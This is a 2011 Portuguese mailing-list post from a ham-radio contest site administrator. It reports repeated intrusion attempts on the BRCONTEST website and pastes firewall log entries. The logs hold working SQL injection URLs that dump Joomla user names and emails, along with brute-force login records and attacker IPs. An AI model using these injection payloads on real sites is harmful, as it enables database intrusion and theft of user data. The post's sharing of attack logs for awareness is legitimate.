(Araucaria) Tentativas sucessivas de invasão website BRCONTEST
Muniz Pepy
py2zy em ymail.com
Sábado Julho 2 12:49:42 BRT 2011
Somente para conhecimento de todos, após o website BRCONTEST ser divulgado novamente no calendário mundial tivemos muitas tentativas de invasão, usuários fantasmas, e tentativas de inserção de códigos de banco de dados que seriam suficiênte para possível destruição do banco de dados.
Foram até agora 2.750 tentativas sucessivas, nestes ultimos dias tivemos em média 150 tentativas diárias. Pois o que estranhou foi o número de acessos.
O mais impressionante, que após rastrear o ip até o ponto de origem que foi de ponto a ponto distribuido entre 15 paises, chegamos a estes 2 paises com volume de 500 tentativas dos mesmos, abaixo somente uma tela resumida dos acessos diretos.
Creio que o sujeito acabou achando que não era nessesária sua ferramenta de invasão, e tentou algumas vezes via brutal force, que é feito diretamente e outra foi montada uma página de invasão em um provedor brasileiro, a fim de tentar direcionar o problema para dentro do Brasil. O infeliz acabou por deixar após 1.500 vezes escapar 2 vezes sua rota.
Conforme monitoramente abaixo... É uma pena, pois não foi robos de SPAM ou outros lixos, a intenção realmente era de derrubar o site antes da saida das novas apurações, e o novo calendário que ira se concretizar este ano.
Infelismente ainda tem isso, espero sinceramente que o mesmo não seja radioamador mais creio que confrontando as datas do inicio do ataque justamente com a divulgação no calendário mundial a coincidência foi muito grande.
Ontem devolvi algumas coisas para este amigo, e me parece que algumas constuções de webpage que o mesmo estava preparando para divulgar algo, referende a RULES... vai ter que reconstruir novamente....... Para mim isso é um termometro para indicar que lá fora existem pessoas que julgam os sulamericanos de forma que muitos ja vinharam me dizer.
UMA GRANDE PENA, O PRECONCEITO AINDA EXISTE E MUITO DE DIVERSAS FORMAS ESTE É MAIS UM DELES.. A BAIXO OS CÓDIGOS DE INVASÃO MAIS COMUNS... DETALHE NÃO É UM IP DIRETO, FOI CHEGADO A ELES APÓS EM MÉDIA CIRCULAR POR 8 A 9 PAISES DIFERENTES... !!!!!!!!!!!!!
We think 91.121.159.57 is from Paris, FRANCEWe think 78.174.106.115 is from Berlin, GERMANY
2011/4/10 8:11:46
Guests
94.122.195.188
IE 7.0
UNION
Pattern like SQL
injection found. (-999.9 UNION ALL SELECT
0x31303235343830303536--)
2010/11/19 5:45:23
Guests
91.201.66.6
IE 7.0
BRUTE FORCE
Trying to login as
'kathygray em mail333.com' found.
2010/10/9 22:48:15
Guests
78.174.106.115
SQL Injection
SELECT COUNT(*) FROM
xoops_protector_access WHERE ip='78.174.106.115' AND
request_uri='/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(0x3a5f,username,0x3a,email,0x5f3a)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--'
2010/10/9 19:38:54
Guests
78.174.106.115
SQL Injection
SELECT COUNT(*) FROM
xoops_protector_access WHERE ip='78.174.106.115' AND
request_uri='/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(activation,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--'
2011/7/2 9:47:51
Guests
91.121.159.57
IE 6.0
BRUTE FORCE
Trying to login as
'andromac' found.
Muniz - PY2ZY msn: py2zy em hotmail.com Grid: GG66qm
skype: sinalcomCantareira DX Group Member CDX#0001
http://cantareiradx.com http://brcontest.comZX2T - PS2Y - Team MemberDMC # 1861 FH # 1743 CDG # 173 EPC # 5645 30MDG # 1767BrContest Committee Rede de emergência de rádio com sensores PLUVIOMÉTRICOS, participe deste projeto salve vidas no verão.Entre em contato para maiores detalhes, não espere os governantes, faça você mesmo. Saiba como entre em contato com o grupo CDX e-qsl.cc Lotw Qrz
Active Member
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: <http://list.araucariadx.com/pipermail/araucaria/attachments/20110702/03639aa4/attachment.html>
Mais detalhes sobre a lista de discussão Araucaria